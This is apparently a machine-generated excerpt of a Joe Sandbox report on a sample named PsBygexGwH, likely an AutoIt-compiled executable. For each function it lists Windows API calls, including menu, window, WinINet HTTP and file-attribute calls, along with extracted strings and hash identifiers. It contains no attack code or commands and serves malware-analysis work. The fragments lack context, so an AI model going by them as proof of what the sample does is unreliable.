                                                          • API String ID: 4194297153-14809454
                                                          • Opcode ID: 38e823f706fad3ed2e804bf6e8ae01782078b08043f37d4fb716f7482f04d888
                                                          • Instruction ID: e8dfd460d3b1381fd381bd6b1db37045b01bdc9156e192be7186d59a9d78df7a
                                                          • Opcode Fuzzy Hash: 38e823f706fad3ed2e804bf6e8ae01782078b08043f37d4fb716f7482f04d888
                                                          • Instruction Fuzzy Hash: 9131D235A00604DFCB52DF68D888AAEBBF5FF54345F548065E405EB292E730ED82CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • CreateMenu.USER32 ref: 001B3C79
                                                          • SetMenu.USER32(?,00000000), ref: 001B3C88
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B3D10
                                                          • IsMenu.USER32(?), ref: 001B3D24
                                                          • CreatePopupMenu.USER32 ref: 001B3D2E
                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001B3D5B
                                                          • DrawMenuBar.USER32 ref: 001B3D63
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                          • String ID: 0$F
                                                          • API String ID: 161812096-3044882817
                                                          • Opcode ID: d05a62472e9df68414654aeb59bb344e4bad9911a2f4dfb5a22a6f34a9a4c432
                                                          • Instruction ID: ed9ed9d76d9ec3c6e073b711ea97d91e79de71fc8c35fd345a35ffffb5cf9102
                                                          • Opcode Fuzzy Hash: d05a62472e9df68414654aeb59bb344e4bad9911a2f4dfb5a22a6f34a9a4c432
                                                          • Instruction Fuzzy Hash: 17416B79A01209EFDB24CFA4D844EEA7BB5FF49350F140129F956A7360D770AA60CF94
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001B3A9D
                                                          • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001B3AA0
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B3AC7
                                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001B3AEA
                                                          • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001B3B62
                                                          • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 001B3BAC
                                                          • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 001B3BC7
                                                          • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 001B3BE2
                                                          • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 001B3BF6
                                                          • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 001B3C13
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$LongWindow
                                                          • String ID:
                                                          • API String ID: 312131281-0
                                                          • Opcode ID: 9c050717863f5de75b38418bcf0344b9901d21600784389c398308346d1b2f48
                                                          • Instruction ID: 6c5ceee07a0c64ffd204809d1445898c6330973ddb6e0d81cfce641bb20d6693
                                                          • Opcode Fuzzy Hash: 9c050717863f5de75b38418bcf0344b9901d21600784389c398308346d1b2f48
                                                          • Instruction Fuzzy Hash: 2F617A75A00248AFDB10DFA8CD81EEE77B8EF09704F10019AFA15E72A1D770AE95DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • _free.LIBCMT ref: 00152C94
                                                            • Part of subcall function 001529C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000), ref: 001529DE
                                                            • Part of subcall function 001529C8: GetLastError.KERNEL32(00000000,?,0015D7D1,00000000,00000000,00000000,00000000,?,0015D7F8,00000000,00000007,00000000,?,0015DBF5,00000000,00000000), ref: 001529F0
                                                          • _free.LIBCMT ref: 00152CA0
                                                          • _free.LIBCMT ref: 00152CAB
                                                          • _free.LIBCMT ref: 00152CB6
                                                          • _free.LIBCMT ref: 00152CC1
                                                          • _free.LIBCMT ref: 00152CCC
                                                          • _free.LIBCMT ref: 00152CD7
                                                          • _free.LIBCMT ref: 00152CE2
                                                          • _free.LIBCMT ref: 00152CED
                                                          • _free.LIBCMT ref: 00152CFB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 1ab1cdf9c2dafa212b9dd3e0435d9c1d5367b418c05420117d418bdf1401c694
                                                          • Instruction ID: 3e0ebdd482c042881de37bbbab9c6c29cecd096a47f90bda75cc000af9241fda
                                                          • Opcode Fuzzy Hash: 1ab1cdf9c2dafa212b9dd3e0435d9c1d5367b418c05420117d418bdf1401c694
                                                          • Instruction Fuzzy Hash: 5A11B276100118EFCB02EF94D882CDD3BA5BF16355F4144A4FA58AF322DB31EA549B90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00121459
                                                          • OleUninitialize.OLE32(?,00000000), ref: 001214F8
                                                          • UnregisterHotKey.USER32(?), ref: 001216DD
                                                          • DestroyWindow.USER32(?), ref: 001624B9
                                                          • FreeLibrary.KERNEL32(?), ref: 0016251E
                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0016254B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                          • String ID: close all
                                                          • API String ID: 469580280-3243417748
                                                          • Opcode ID: 8dac98dd3f945fe58dbc41939ab06ee8b8e50bd193da566f35318b6f3415e796
                                                          • Instruction ID: 0b451849ca832008a82932b9ed444118b713dc960e316439d0e80a6cd18850d8
                                                          • Opcode Fuzzy Hash: 8dac98dd3f945fe58dbc41939ab06ee8b8e50bd193da566f35318b6f3415e796
                                                          • Instruction Fuzzy Hash: 44D17031701622DFDB29EF14D899A69F7A4BF25700F1542ADE84A6B251DB30ED32CF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00197FAD
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00197FC1
                                                          • GetFileAttributesW.KERNEL32(?), ref: 00197FEB
                                                          • SetFileAttributesW.KERNEL32(?,00000000), ref: 00198005
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00198017
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00198060
                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 001980B0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: CurrentDirectory$AttributesFile
                                                          • String ID: *.*
                                                          • API String ID: 769691225-438819550
                                                          • Opcode ID: a391c67e8470aded47bb3fbb23c4ec08813ca7bdb6caf8abe8702f5446094390
                                                          • Instruction ID: 55865dd60f8ca8fb3697051ae2e7011ccd451ea13b26d88a5795d65069d920be
                                                          • Opcode Fuzzy Hash: a391c67e8470aded47bb3fbb23c4ec08813ca7bdb6caf8abe8702f5446094390
                                                          • Instruction Fuzzy Hash: 6C81A1725182459BCF24EF14C8459AEB3E8BF99310F584C6EF885D7290EB34ED49CB92
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SetWindowLongW.USER32(?,000000EB), ref: 00125C7A
                                                            • Part of subcall function 00125D0A: GetClientRect.USER32(?,?), ref: 00125D30
                                                            • Part of subcall function 00125D0A: GetWindowRect.USER32(?,?), ref: 00125D71
                                                            • Part of subcall function 00125D0A: ScreenToClient.USER32(?,?), ref: 00125D99
                                                          • GetDC.USER32 ref: 001646F5
                                                          • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00164708
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00164716
                                                          • SelectObject.GDI32(00000000,00000000), ref: 0016472B
                                                          • ReleaseDC.USER32(?,00000000), ref: 00164733
                                                          • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001647C4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                          • String ID: U
                                                          • API String ID: 4009187628-3372436214
                                                          • Opcode ID: f6aa6e87cbfad0cf31f3bc0ef25afaa8bced640fb2a4be0d5e51848c057cb957
                                                          • Instruction ID: ed6a7bc0452dd57e8dbb8399e16fc7a409ae1846c70837c6b220b6181612f973
                                                          • Opcode Fuzzy Hash: f6aa6e87cbfad0cf31f3bc0ef25afaa8bced640fb2a4be0d5e51848c057cb957
                                                          • Instruction Fuzzy Hash: 1771EE31400205EFCF25CF64CD84AFA3BB6FF4A364F184269ED555A2A6D73098A1DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001935E4
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • LoadStringW.USER32(001F2390,?,00000FFF,?), ref: 0019360A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: LoadString$_wcslen
                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                          • API String ID: 4099089115-2391861430
                                                          • Opcode ID: 65d91826ccc29cf994b398d988a9c6410fd231c3aa2911df4b407ff7e710ac71
                                                          • Instruction ID: f8cc5bc45fffe920948fb222ce9ae3fae6f9c8c78cbc93b541982a389bcdae7d
                                                          • Opcode Fuzzy Hash: 65d91826ccc29cf994b398d988a9c6410fd231c3aa2911df4b407ff7e710ac71
                                                          • Instruction Fuzzy Hash: 11514A7180021ABACF15EBE1EC42EEEBB78BF24354F144125F115721A1EB311BA9DFA1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0019C272
                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0019C29A
                                                          • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0019C2CA
                                                          • GetLastError.KERNEL32 ref: 0019C322
                                                          • SetEvent.KERNEL32(?), ref: 0019C336
                                                          • InternetCloseHandle.WININET(00000000), ref: 0019C341
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                          • String ID:
                                                          • API String ID: 3113390036-3916222277
                                                          • Opcode ID: 8c68d4436ea21472b142a84b8478fc20e6529be9a86b1faf5c120c663b3f0ad9
                                                          • Instruction ID: 3d0a95935ef1d5e9b7b2c4bc87e7b03d57c0fe009b9aa712dc247a826b02e6c5
                                                          • Opcode Fuzzy Hash: 8c68d4436ea21472b142a84b8478fc20e6529be9a86b1faf5c120c663b3f0ad9
                                                          • Instruction Fuzzy Hash: 28318EB1600208AFDB219FA4CC88AAB7BFCFB59744F14851EF486D2610DB30DE449BE1
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00163AAF,?,?,Bad directive syntax error,001BCC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 001898BC
                                                          • LoadStringW.USER32(00000000,?,00163AAF,?), ref: 001898C3
                                                            • Part of subcall function 00129CB3: _wcslen.LIBCMT ref: 00129CBD
                                                          • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00189987
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: HandleLoadMessageModuleString_wcslen
                                                          • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                          • API String ID: 858772685-4153970271
                                                          • Opcode ID: d2ad270723cc6962d880317bcd57318fb0eda222825f291672cb3dbda264e57a
                                                          • Instruction ID: 64e449bd7ee97e88c5c5a24ab51fc82ca66a57f599daf47343ef14215ac1ffcb
                                                          • Opcode Fuzzy Hash: d2ad270723cc6962d880317bcd57318fb0eda222825f291672cb3dbda264e57a
                                                          • Instruction Fuzzy Hash: F4218D31C0021EBBCF15EF90DC06EEE7775BF28304F084469F515660A2EB719A68DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetParent.USER32 ref: 001820AB
                                                          • GetClassNameW.USER32(00000000,?,00000100), ref: 001820C0
                                                          • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0018214D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: ClassMessageNameParentSend
                                                          • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                          • API String ID: 1290815626-3381328864
                                                          • Opcode ID: e38d5295278d99b5056029b56a11bebf12df74befa9fc15eb85d4031b2d94e8b
                                                          • Instruction ID: 0ab20f77c9fe1196b720eb7317d5d1fabf9f13185edbccd72289c776af0b32f3
                                                          • Opcode Fuzzy Hash: e38d5295278d99b5056029b56a11bebf12df74befa9fc15eb85d4031b2d94e8b
                                                          • Instruction Fuzzy Hash: D9112976688B06BAF7067321DC0BDEB379EDB15328B300116FB05A51E2FFB169415B54
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                          • String ID:
                                                          • API String ID: 1282221369-0
                                                          • Opcode ID: a1379b4d03c552bd9debaadfadc35f8208385aa0a8ffa765d2ae97de4f6192ee
                                                          • Instruction ID: 3641675d10f4fb6d86d612905520c2cacc26026c2ea826a5119ebc38d100974d
                                                          • Opcode Fuzzy Hash: a1379b4d03c552bd9debaadfadc35f8208385aa0a8ffa765d2ae97de4f6192ee
                                                          • Instruction Fuzzy Hash: 7B612472904310EFDB22AFB4D881A7E7BE5AF16316F04416EFD64AF282D7319949C790
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 001B5186
                                                          • ShowWindow.USER32(?,00000000), ref: 001B51C7
                                                          • ShowWindow.USER32(?,00000005,?,00000000), ref: 001B51CD
                                                          • SetFocus.USER32(?,?,00000005,?,00000000), ref: 001B51D1
                                                            • Part of subcall function 001B6FBA: DeleteObject.GDI32(00000000), ref: 001B6FE6
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 001B520D
                                                          • SetWindowLongW.USER32(?,000000F0,00000000), ref: 001B521A
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 001B524D
                                                          • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 001B5287
                                                          • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 001B5296
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                          • String ID:
                                                          • API String ID: 3210457359-0
                                                          • Opcode ID: ba8b9edc6ca74aa6f41c814460bd223599be1e85bf8cd2172ba6bba86131b5a5
                                                          • Instruction ID: b443977fab5f57bb278d2e0ae5c83ad1af019ad2d6b2193dac0b17bdc3052ca8
                                                          • Opcode Fuzzy Hash: ba8b9edc6ca74aa6f41c814460bd223599be1e85bf8cd2172ba6bba86131b5a5
                                                          • Instruction Fuzzy Hash: 4551C030A42A08FFEF249F28DC4ABD83B67FB15365F184152F615962E0C7B5A980DB41
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00176890
                                                          • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 001768A9
                                                          • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 001768B9
                                                          • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 001768D1
                                                          • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 001768F2
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00138874,00000000,00000000,00000000,000000FF,00000000), ref: 00176901
                                                          • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0017691E
                                                          • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00138874,00000000,00000000,00000000,000000FF,00000000), ref: 0017692D
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                          • String ID:
                                                          • API String ID: 1268354404-0
                                                          • Opcode ID: ca72515af33fbccf652122977034165579ea05b672613395942b844ec3089ecf
                                                          • Instruction ID: f3afe80d7ed9162a3bac8a93d357d192d862ce1b034b0402744b56a797945a5d
                                                          • Opcode Fuzzy Hash: ca72515af33fbccf652122977034165579ea05b672613395942b844ec3089ecf
                                                          • Instruction Fuzzy Hash: 29519A7060070AEFDB24CF24CC55FAABBB5FB58354F104618F946A72A0DBB0E990DB90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0019C182
                                                          • GetLastError.KERNEL32 ref: 0019C195
                                                          • SetEvent.KERNEL32(?), ref: 0019C1A9
                                                            • Part of subcall function 0019C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0019C272
                                                            • Part of subcall function 0019C253: GetLastError.KERNEL32 ref: 0019C322
                                                            • Part of subcall function 0019C253: SetEvent.KERNEL32(?), ref: 0019C336
                                                            • Part of subcall function 0019C253: InternetCloseHandle.WININET(00000000), ref: 0019C341
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2975065048.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                          • Associated: 00000000.00000002.2975048702.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001BC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975113061.00000000001E2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975150531.00000000001EC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2975166729.00000000001F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_120000_PsBygexGwH.jbxd
                                                          Similarity
                                                          • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                          • String ID:
                                                          • API String ID: 337547030-0
                                                          • Opcode ID: 5b4d348c1eb24d0c9172c4caa48ed83bbee5633fd708ebb7882f15e814bc3989
                                                          • Instruction ID: 06b5beb1df521952a2515cc4d96bf060c555ba3c95808232a66bc289abd0f232
                                                          • Opcode Fuzzy Hash: 5b4d348c1eb24d0c9172c4caa48ed83bbee5633fd708ebb7882f15e814bc3989
                                                          • Instruction Fuzzy Hash: 3E319C71200701EFDF259FA5DC44A66BBF9FF68700B14452DF99682A20DB30E854DBE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 00183A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00183A57
